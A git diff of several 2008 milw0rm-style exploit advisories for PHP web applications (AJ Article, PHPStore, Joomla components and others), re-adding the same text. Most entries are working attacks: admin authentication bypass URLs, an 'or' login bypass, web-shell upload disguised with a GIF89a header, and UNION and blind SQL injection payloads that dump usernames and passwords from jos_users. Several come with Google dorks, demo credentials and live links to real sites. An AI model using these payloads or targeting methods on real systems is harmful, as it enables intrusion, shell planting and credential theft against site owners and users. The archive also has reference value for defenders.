- - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 - [»] Hussain-X - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... 
- -=============================================================================== -exit(); -=============================================================================== - -# milw0rm.com [2008-11-10] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + AJ Article Auth Bypass Vulnerability +============================================================================== + + [»] Script: [ AJ Article ] + [»] Language: [ PHP ] + [»] Website: [ http://www.ajsquare.com/products/article/ ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 10.11.2008 ] + [»] Founder: [ G4N0K ] + + +===[ XPL ]=== + + [»] http://localhost/[path]/admin/user.php + [»] http://localhost/[path]/admin/articles.php + [»] http://localhost/[path]/admin/articlesuspend.php + [»] http://localhost/[path]/admin/site.php + [»] http://localhost/[path]/admin/statistics.php + [»] http://localhost/[path]/admin/mail.php + [»] http://localhost/[path]/admin/category.php + [»] http://localhost/[path]/admin/subcategory.php + [»] http://localhost/[path]/admin/changepassword.php + [»] http://localhost/[path]/admin/polling.php + [»] http://localhost/[path]/admin/logo.php + [»] ... + + + +===[ LIVE ]=== + + [»] http://www.ajsquare.com/products/demo/admin/ + + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 + [»] Hussain-X + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... 
+ +=============================================================================== +exit(); +=============================================================================== + +# milw0rm.com [2008-11-10] diff --git a/platforms/php/webapps/7082.txt b/platforms/php/webapps/7082.txt index fdce1f1a1..983681d58 100755 --- a/platforms/php/webapps/7082.txt +++ b/platforms/php/webapps/7082.txt 
@@ -1,63 +1,63 @@ -PHP Store Auto Classifieds Remote File Upload - -Author: ZoRLu msn: trt-turk@hotmail.com - -home: www.z0rlu.blogspot.com - -N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( - ------------------------------------------ - - -exploit: - - -first register to site - -you add this code your shell to head - -GIF89a; - -example your_shell.php: - -GIF89a; - - -and save your_sheell.php - -login to site and edit your profile - -upload your_shell.php - -your_shell.php path: - -localhost/script/cars_images/[ID]_logo_your_shell.php - ---------------------------------------------- - -example for demo: - -login: http://www.phpstore.info/demos/cars/login.php - -user: zorlu - -passwd: zorlu1 - -shell: - -http://www.phpstore.info/demos/cars/cars_images/1226241384_logo_c.php - - ------------------------------------------------- - -thanks: str0ke & yildirimordulari.org & darkc0de.com - -# milw0rm.com [2008-11-10] +PHP Store Auto Classifieds Remote File Upload + +Author: ZoRLu msn: trt-turk@hotmail.com + +home: www.z0rlu.blogspot.com + +N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( + +----------------------------------------- + + +exploit: + + +first register to site + +you add this code your shell to head + +GIF89a; + +example your_shell.php: + +GIF89a; + + +and save your_sheell.php + +login to site and edit your profile + +upload your_shell.php + +your_shell.php path: + +localhost/script/cars_images/[ID]_logo_your_shell.php + +--------------------------------------------- + +example for demo: + +login: http://www.phpstore.info/demos/cars/login.php + +user: zorlu + +passwd: zorlu1 + +shell: + +http://www.phpstore.info/demos/cars/cars_images/1226241384_logo_c.php + + +------------------------------------------------ + +thanks: str0ke & yildirimordulari.org & darkc0de.com + +# milw0rm.com [2008-11-10] diff --git a/platforms/php/webapps/7083.txt b/platforms/php/webapps/7083.txt index f88e67731..7dfe58ac7 100755 --- a/platforms/php/webapps/7083.txt 
+++ b/platforms/php/webapps/7083.txt 
@@ -1,64 +1,64 @@ -PHPStore Job Search Remote File Upload - -Author: ZoRLu msn: trt-turk@hotmail.com - -home: www.z0rlu.blogspot.com - -N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( - ------------------------------------------ - - -exploit: - - -you add this code your shell to head - -GIF89a; - -example your_shell.php: - -GIF89a; - - -and save your_sheell.php - -you register site and this site questions your photo. you upload your_shell.php - -you clikc to view resume and open new page ( direckt link: http://localhost/script/preview.php ) - -you must see your photo - -and right click to your photo select to properites - -after copy photo link and paste your explorer go your shell - -your_shell.php - -http://localhost/script/jobseekers/jobseeker_profile_images/[id]_offer_your_shel.php - - ---------------------------------------------- - -example for demo: - -shell: ( not permission for demo server ) - -http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/1226242993_offer_c.php - - -http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/ ( you look here and see shell 1226242993_offer_c.php ) - ------------------------------------------------- - -thanks: str0ke & yildirimordulari.org & darkc0de.com - -# milw0rm.com [2008-11-10] +PHPStore Job Search Remote File Upload + +Author: ZoRLu msn: trt-turk@hotmail.com + +home: www.z0rlu.blogspot.com + +N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( + +----------------------------------------- + + +exploit: + + +you add this code your shell to head + +GIF89a; + +example your_shell.php: + +GIF89a; + + +and save your_sheell.php + +you register site and this site questions your photo. 
you upload your_shell.php + +you clikc to view resume and open new page ( direckt link: http://localhost/script/preview.php ) + +you must see your photo + +and right click to your photo select to properites + +after copy photo link and paste your explorer go your shell + +your_shell.php + +http://localhost/script/jobseekers/jobseeker_profile_images/[id]_offer_your_shel.php + + +--------------------------------------------- + +example for demo: + +shell: ( not permission for demo server ) + +http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/1226242993_offer_c.php + + +http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/ ( you look here and see shell 1226242993_offer_c.php ) + +------------------------------------------------ + +thanks: str0ke & yildirimordulari.org & darkc0de.com + +# milw0rm.com [2008-11-10] diff --git a/platforms/php/webapps/7084.txt b/platforms/php/webapps/7084.txt index eddfba4aa..a7b2a7a61 100755 --- a/platforms/php/webapps/7084.txt +++ b/platforms/php/webapps/7084.txt 
@@ -1,63 +1,63 @@ -PHPStore Complete Customizable Classifieds Remote File Upload - -Author: ZoRLu msn: trt-turk@hotmail.com - -home: www.z0rlu.blogspot.com - -N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( - ------------------------------------------ - - -exploit: - - -first register to site - -you add this code your shell to head - -GIF89a; - -example your_shell.php: - -GIF89a; - - -and save your_sheell.php - -login to site and Add Listing click open the new page upload logo (upload your_shell.php) - -your_shell.php path: - -localhost/script/yellow_images/[ID]_logo_your_shell.php - ---------------------------------------------- - -example for demo: - -login: http://www.phpstore.info/demos/cars/login.php - -user: zorlu - -passwd: zorlu1 - -shell: ( not permission for demo server ) - -http://www.phpstore.info/demos/classifieds1/yellow_images/1226242317_logo_c.php - - -http://www.phpstore.info/demos/classifieds1/yellow_images/ ( you look here and see shell 1226242317_logo_c.php ) - ------------------------------------------------- - -thanks: str0ke & yildirimordulari.org & darkc0de.com - -# milw0rm.com [2008-11-10] +PHPStore Complete Customizable Classifieds Remote File Upload + +Author: ZoRLu msn: trt-turk@hotmail.com + +home: www.z0rlu.blogspot.com + +N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( + +----------------------------------------- + + +exploit: + + +first register to site + +you add this code your shell to head + +GIF89a; + +example your_shell.php: + +GIF89a; + + +and save your_sheell.php + +login to site and Add Listing click open the new page upload logo (upload your_shell.php) + +your_shell.php path: + +localhost/script/yellow_images/[ID]_logo_your_shell.php + +--------------------------------------------- + +example for demo: + +login: http://www.phpstore.info/demos/cars/login.php + +user: zorlu + +passwd: zorlu1 + +shell: ( not permission for demo server ) + +http://www.phpstore.info/demos/classifieds1/yellow_images/1226242317_logo_c.php 
+ + +http://www.phpstore.info/demos/classifieds1/yellow_images/ ( you look here and see shell 1226242317_logo_c.php ) + +------------------------------------------------ + +thanks: str0ke & yildirimordulari.org & darkc0de.com + +# milw0rm.com [2008-11-10] diff --git a/platforms/php/webapps/7085.txt b/platforms/php/webapps/7085.txt index 5ccbd8e6d..d41d43822 100755 --- a/platforms/php/webapps/7085.txt +++ b/platforms/php/webapps/7085.txt 
@@ -1,61 +1,61 @@ -PHP Store Real Estate Remote File Upload - -Author: ZoRLu msn: trt-turk@hotmail.com - -home: www.z0rlu.blogspot.com - -N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( - ------------------------------------------ - - -exploit: - - -first register to site - -you add this code your shell to head - -GIF89a; - -example your_shell.php: - -GIF89a; - - -and save your_sheell.php - -login to site and edit your profile - -upload your_shell.php - -your_shell.php path: - -localhost/script/re_images/[ID]_logo_your_shell.php - ---------------------------------------------- - -user: zorlu - -passwd: zorlu1 - -shell: ( not permission for demo server ) - -http://www.phpstore.info/demos/realty/re_images/1226243945_logo_c.php - - -http://www.phpstore.info/demos/realty/re_images/ ( you look here and see shell 1226243945_logo_c.php ) - ------------------------------------------------- - -thanks: str0ke & yildirimordulari.org & darkc0de.com - -# milw0rm.com [2008-11-10] +PHP Store Real Estate Remote File Upload + +Author: ZoRLu msn: trt-turk@hotmail.com + +home: www.z0rlu.blogspot.com + +N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( + +----------------------------------------- + + +exploit: + + +first register to site + +you add this code your shell to head + +GIF89a; + +example your_shell.php: + +GIF89a; + + +and save your_sheell.php + +login to site and edit your profile + +upload your_shell.php + +your_shell.php path: + +localhost/script/re_images/[ID]_logo_your_shell.php + +--------------------------------------------- + +user: zorlu + +passwd: zorlu1 + +shell: ( not permission for demo server ) + +http://www.phpstore.info/demos/realty/re_images/1226243945_logo_c.php + + +http://www.phpstore.info/demos/realty/re_images/ ( you look here and see shell 1226243945_logo_c.php ) + +------------------------------------------------ + +thanks: str0ke & yildirimordulari.org & darkc0de.com + +# milw0rm.com [2008-11-10] 
diff --git a/platforms/php/webapps/7086.txt b/platforms/php/webapps/7086.txt
index 73ca919db..ece86f4f5 100755
--- a/platforms/php/webapps/7086.txt
+++ b/platforms/php/webapps/7086.txt
@@ -1,72 +1,72 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - AJSquare Free Polling Script (DB) Multiple Vulnerabilities -============================================================================== - - [»] Script: [ AJSquare Free Polling Script DataBase Version ] - [»] Language: [ PHP ] - [»] Website: [ http://www.ajsquare.com/resources/dpoll.php?resource=free_script ] - [»] Type: [ Free ] - [»] Report-Date: [ 10.11.2008 ] - [»] Founder: [ G4N0K ] - - -===[ XPL ]=== - - [1][!] Blind SQLi (MQ = off) - [»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=5/* True - [»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=4/* False - - [../admin/include/newpoll.php] - - - [»] Hussain-X - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... 
- -=============================================================================== -exit(); -=============================================================================== - -# milw0rm.com [2008-11-10] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + AJSquare Free Polling Script (DB) Multiple Vulnerabilities +============================================================================== + + [»] Script: [ AJSquare Free Polling Script DataBase Version ] + [»] Language: [ PHP ] + [»] Website: [ http://www.ajsquare.com/resources/dpoll.php?resource=free_script ] + [»] Type: [ Free ] + [»] Report-Date: [ 10.11.2008 ] + [»] Founder: [ G4N0K ] + + +===[ XPL ]=== + + [1][!] Blind SQLi (MQ = off) + [»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=5/* True + [»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=4/* False + + [../admin/include/newpoll.php] + + + [»] Hussain-X + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... + +=============================================================================== +exit(); +=============================================================================== + +# milw0rm.com [2008-11-10] diff --git a/platforms/php/webapps/7089.txt b/platforms/php/webapps/7089.txt index ef756508c..2839e36d8 100755 --- a/platforms/php/webapps/7089.txt 
+++ b/platforms/php/webapps/7089.txt 
@@ -1,54 +1,54 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - AJ Classifieds Auth Bypass Vulnerability -============================================================================== - - [»] Script: [ AJ Classifieds Craigs | AJ Classifieds Elite ] - [»] Language: [ PHP ] - [»] Website: [ http://www.ajclassifieds.net ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 10.11.2008 ] - [»] Founder: [ G4N0K ] - - -===[ XPL ]=== - - [»] http://localhost/[path]/admin/home.php - [»] ... - - - -===[ LIVE ]=== - - [»] http://ajclassifieds.net/demo/ajlist-craigs/admin/ - [»] http://ajclassifieds.net/demo/ajlist-elite/admin/ - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 - [»] Hussain-X - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... 
- -=============================================================================== -exit(); -=============================================================================== - -# milw0rm.com [2008-11-11] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + AJ Classifieds Auth Bypass Vulnerability +============================================================================== + + [»] Script: [ AJ Classifieds Craigs | AJ Classifieds Elite ] + [»] Language: [ PHP ] + [»] Website: [ http://www.ajclassifieds.net ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 10.11.2008 ] + [»] Founder: [ G4N0K ] + + +===[ XPL ]=== + + [»] http://localhost/[path]/admin/home.php + [»] ... + + + +===[ LIVE ]=== + + [»] http://ajclassifieds.net/demo/ajlist-craigs/admin/ + [»] http://ajclassifieds.net/demo/ajlist-elite/admin/ + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 + [»] Hussain-X + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... + +=============================================================================== +exit(); +=============================================================================== + +# milw0rm.com [2008-11-11] diff --git a/platforms/php/webapps/7092.txt b/platforms/php/webapps/7092.txt index e1eecb058..bc6de671c 100755 --- a/platforms/php/webapps/7092.txt +++ b/platforms/php/webapps/7092.txt 
@@ -1,30 +1,30 @@
-#######################################################
-Joomla com_books(book_id) SQL injection Vulnerability
-#######################################################
-
-
-###################################################
-#[~] Author : boom3rang
-#[~] Kosova Hackers Group [www.khg-crew.ws]
-#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
-
-#[!] Module_Name: com_books
-#[!] Script_Name: Joomla
-#[!] Google_Dork: inurl:"com_books"
-##################################################
-
-#[~] Example:
-http://localhost/Path/index.php?option=com_books&task=book_details&book_id=[exploit]
-
-
-#[~]Exploit:
--9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--
-
-
-##############################
-#[!] Proud 2 be Albanian
-#[!] Proud 2 be Muslim
-#[!] United States of Albania
-##############################
-
-# milw0rm.com [2008-11-11]
+#######################################################
+Joomla com_books(book_id) SQL injection Vulnerability
+#######################################################
+
+
+###################################################
+#[~] Author : boom3rang
+#[~] Kosova Hackers Group [www.khg-crew.ws]
+#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
+
+#[!] Module_Name: com_books
+#[!] Script_Name: Joomla
+#[!] Google_Dork: inurl:"com_books"
+##################################################
+
+#[~] Example:
+http://localhost/Path/index.php?option=com_books&task=book_details&book_id=[exploit]
+
+
+#[~]Exploit:
+-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--
+
+
+##############################
+#[!] Proud 2 be Albanian
+#[!] Proud 2 be Muslim
+#[!] United States of Albania
+##############################
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7093.txt b/platforms/php/webapps/7093.txt
index 1ad0a1e77..776e1c51e 100755
--- a/platforms/php/webapps/7093.txt
+++ b/platforms/php/webapps/7093.txt
@@ -1,32 +1,32 @@
-###########################################################
-Joomla com_contactinfo(catid) SQL-injection vulnerability
-###########################################################
-
-###################################################
-#[~] Author : boom3rang
-#[~] Kosova Hackers Group [www.khg-crew.ws]
-#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
-
-#[!] Module_Name: com_contactinfo
-#[!] Script_Name: Joomla
-#[!] Google_Dork: inurl:"com_contactinfo"
-##################################################
-
-
-#[~] Example:
-http://localhost/Path/index.php?option=com_contactinfo&catid=[exploit]
-
-#[~] Exploit:
--9999/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11,12,13,14,15,16+from+jos_users/*
-
-#[~] LiveDemo:
-http://www.planetacentr.ru/index.php?option=com_contactinfo&catid=-9999/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11,12,13,14,15,16+from+jos_users/*
-
-
-##############################
-#[!] Proud 2 be Albanian
-#[!] Proud 2 be Muslim
-#[!] United States of Albania
-##############################
-
-# milw0rm.com [2008-11-11]
+###########################################################
+Joomla com_contactinfo(catid) SQL-injection vulnerability
+###########################################################
+
+###################################################
+#[~] Author : boom3rang
+#[~] Kosova Hackers Group [www.khg-crew.ws]
+#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
+
+#[!] Module_Name: com_contactinfo
+#[!] Script_Name: Joomla
+#[!] Google_Dork: inurl:"com_contactinfo"
+##################################################
+
+
+#[~] Example:
+http://localhost/Path/index.php?option=com_contactinfo&catid=[exploit]
+
+#[~] Exploit:
+-9999/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11,12,13,14,15,16+from+jos_users/*
+
+#[~] LiveDemo:
+http://www.planetacentr.ru/index.php?option=com_contactinfo&catid=-9999/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11,12,13,14,15,16+from+jos_users/*
+
+
+##############################
+#[!] Proud 2 be Albanian
+#[!] Proud 2 be Muslim
+#[!] United States of Albania
+##############################
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7094.txt b/platforms/php/webapps/7094.txt
index 6ee358ce0..90064f7bc 100755
--- a/platforms/php/webapps/7094.txt
+++ b/platforms/php/webapps/7094.txt
@@ -1,19 +1,19 @@
-Pre Real Estate Listings (login.php) ByPass /File Upload
-Script:Pre Real Estate Listings
-HomePage:http://preproject.com/
-Demo:http://preproject.com/ulisting/
-Author:BackDoor
-By Pass Exploit:
-http://victim.com/scriptpath/login.php username:'or' password:'or'
-Live Demo:
-http://preproject.com/ulisting/login.php
-File Upload Exploit:
-login live demo username:'or' password:'or'
-Edit Your Profile Link:http://preproject.com/ulisting/profile.php
-Upload Your Shell:
-Example:
-http://preproject.com/ulisting/re_images/1221553817_logo_wp.php
-
-Cyber-Security TIM //Lojistik
-
-# milw0rm.com [2008-11-11]
+Pre Real Estate Listings (login.php) ByPass /File Upload
+Script:Pre Real Estate Listings
+HomePage:http://preproject.com/
+Demo:http://preproject.com/ulisting/
+Author:BackDoor
+By Pass Exploit:
+http://victim.com/scriptpath/login.php username:'or' password:'or'
+Live Demo:
+http://preproject.com/ulisting/login.php
+File Upload Exploit:
+login live demo username:'or' password:'or'
+Edit Your Profile Link:http://preproject.com/ulisting/profile.php
+Upload Your Shell:
+Example:
+http://preproject.com/ulisting/re_images/1221553817_logo_wp.php
+
+Cyber-Security TIM //Lojistik
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7095.txt b/platforms/php/webapps/7095.txt
index 3bf2c0765..c96a60cac 100755
--- a/platforms/php/webapps/7095.txt
+++ b/platforms/php/webapps/7095.txt
@@ -1,33 +1,33 @@
-####################################################################
-Joomla & Mambo com_catalogproduction (id) SQL injection vulnerability!
-####################################################################
-
-###################################################
-#[~] Author : boom3rang
-#[~] Kosova Hackers Group [www.khg-crew.ws]
-#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
-
-#[!] Module_Name: com_catalogproduction
-#[!] Script_Name: Joomla & Mambo
-#[!] Google_Dork: inurl:"com_catalogproduction"
-##################################################
-
-
-#[~] Example:
-http://localhost/Path/index.php?option=com_catalogproduction&task=viewdetail&id=[exploit]
-
-
-#[~]Joomla Exploit:
--9999 union all select 1,2,concat(username,char(58),password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_users
-
-
-#[~]Mambo Exploit:
--9999 union all select 1,2,concat(username,char(58),password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+mos_users
-
-##############################
-#[!] Proud 2 be Albanian
-#[!] Proud 2 be Muslim
-#[!] United States of Albania
-##############################
-
-# milw0rm.com [2008-11-11]
+####################################################################
+Joomla & Mambo com_catalogproduction (id) SQL injection vulnerability!
+####################################################################
+
+###################################################
+#[~] Author : boom3rang
+#[~] Kosova Hackers Group [www.khg-crew.ws]
+#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
+
+#[!] Module_Name: com_catalogproduction
+#[!] Script_Name: Joomla & Mambo
+#[!] Google_Dork: inurl:"com_catalogproduction"
+##################################################
+
+
+#[~] Example:
+http://localhost/Path/index.php?option=com_catalogproduction&task=viewdetail&id=[exploit]
+
+
+#[~]Joomla Exploit:
+-9999 union all select 1,2,concat(username,char(58),password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_users
+
+
+#[~]Mambo Exploit:
+-9999 union all select 1,2,concat(username,char(58),password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+mos_users
+
+##############################
+#[!] Proud 2 be Albanian
+#[!] Proud 2 be Muslim
+#[!] United States of Albania
+##############################
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7096.txt b/platforms/php/webapps/7096.txt
index 6e75d3701..8802bccd0 100755
--- a/platforms/php/webapps/7096.txt
+++ b/platforms/php/webapps/7096.txt
@@ -1,44 +1,43 @@
-
-================================================================================================================================
-
-
- [o] Simple RSS Reader Component 1.0 Remote File Inclusion Vulnerability
-
- Software : com_rssreader version 1.0
- Vendor : http://www.joomlashop.dk/
- Download : http://extensions.joomlashop.dk/index.php?option=com_docman&task=cat_view&gid=16&Itemid=47
- Author : NoGe
- Contact : noge[dot]code[at]gmail[dot]com
- Blog : http://evilc0de.blogspot.com
-
-
-================================================================================================================================
-
-
- [o] Vulnerable file
-
- administrator/components/com_rssreader/admin.rssreader.php
-
- include( "$mosConfig_live_site/components/com_rssreader/about.html" );
-
-
-
- [o] Exploit
-
- http://localhost/[path]/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=[evilcode]
-
-
-================================================================================================================================
-
-
- [o] Greetz
-
- MainHack BrotherHood [ http://serverisdown.org/blog/]
- Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
- H312Y yooogy mousekill }^-^{ kaka11 martfella
- skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-
-================================================================================================================================
-
-# milw0rm.com [2008-11-11]
+================================================================================================================================
+
+
+ [o] Simple RSS Reader Component 1.0 Remote File Inclusion Vulnerability
+
+ Software : com_rssreader version 1.0
+ Vendor : http://www.joomlashop.dk/
+ Download : http://extensions.joomlashop.dk/index.php?option=com_docman&task=cat_view&gid=16&Itemid=47
+ Author : NoGe
+ Contact : noge[dot]code[at]gmail[dot]com
+ Blog : http://evilc0de.blogspot.com
+
+
+================================================================================================================================
+
+
+ [o] Vulnerable file
+
+ administrator/components/com_rssreader/admin.rssreader.php
+
+ include( "$mosConfig_live_site/components/com_rssreader/about.html" );
+
+
+
+ [o] Exploit
+
+ http://localhost/[path]/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=[evilcode]
+
+
+================================================================================================================================
+
+
+ [o] Greetz
+
+ MainHack BrotherHood [ http://serverisdown.org/blog/]
+ Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+ H312Y yooogy mousekill }^-^{ kaka11 martfella
+ skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+
+================================================================================================================================
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7097.txt b/platforms/php/webapps/7097.txt
index da6b1a15a..23bd8bc6d 100755
--- a/platforms/php/webapps/7097.txt
+++ b/platforms/php/webapps/7097.txt
@@ -1,34 +1,34 @@
-###########################################################
-Joomla com_marketplace(catid) SQL-injection vulnerability
-###########################################################
-
-###################################################
-#[~] Author : TR-ShaRk
-#[~] Msn : Starhack@tr-shark.org
-#[~] Im Not Hacker
-#[~] Greetz : FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER
-#[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri
-
-#[!] Module_Name: com_marketplace
-#[!] Script_Name: Joomla
-#[!] Google_Dork: inurl:"com_marketplace"
-#[!] Script Download: http://download.joomlaportal.ch/images/stories/loady/komponente/com_marketplace_v131.zip
-##################################################
-
-
-#[~] Example:
-http://localhost/Path/index.php?option=com_marketplace&page=show_category&catid=[TR-ShaRk]
-
-#[~] Exploit:
-9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--
-
-
-#[~] LiveDemo:
-http://www.mmopa.com/index.php?option=com_marketplace&page=show_category&catid=9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--
-
-
-###############################
-Biz Hic Bir Zaman Kraliz Demedik Bunu Kanitladik
-###############################
-
-# milw0rm.com [2008-11-11]
+###########################################################
+Joomla com_marketplace(catid) SQL-injection vulnerability
+###########################################################
+
+###################################################
+#[~] Author : TR-ShaRk
+#[~] Msn : Starhack@tr-shark.org
+#[~] Im Not Hacker
+#[~] Greetz : FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER
+#[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri
+
+#[!] Module_Name: com_marketplace
+#[!] Script_Name: Joomla
+#[!] Google_Dork: inurl:"com_marketplace"
+#[!] Script Download: http://download.joomlaportal.ch/images/stories/loady/komponente/com_marketplace_v131.zip
+##################################################
+
+
+#[~] Example:
+http://localhost/Path/index.php?option=com_marketplace&page=show_category&catid=[TR-ShaRk]
+
+#[~] Exploit:
+9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--
+
+
+#[~] LiveDemo:
+http://www.mmopa.com/index.php?option=com_marketplace&page=show_category&catid=9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--
+
+
+###############################
+Biz Hic Bir Zaman Kraliz Demedik Bunu Kanitladik
+###############################
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7098.txt b/platforms/php/webapps/7098.txt
index 08c5bf9cc..1352ffd04 100755
--- a/platforms/php/webapps/7098.txt
+++ b/platforms/php/webapps/7098.txt
@@ -1,52 +1,52 @@
-|___________________________________________________
-|
-| Business Directory Script ( cid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|-------------------- Hussin X -------------------
-|
-| Author: Hussin X
-|
-| Home : WwW.IQ-ty.CoM
-|
-| email: darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|
-| script : http://www.pozscripts.com/product_details.php?item_id=6
-|
-| DorK : :)
-|___________________________________________________
-
-Exploit:
-________
-
-
-
-www.[target].com/Script/showcategory.php?cid=-264+union+select+1,concat(user(),0x3e,version()),3,4,5--
-
-
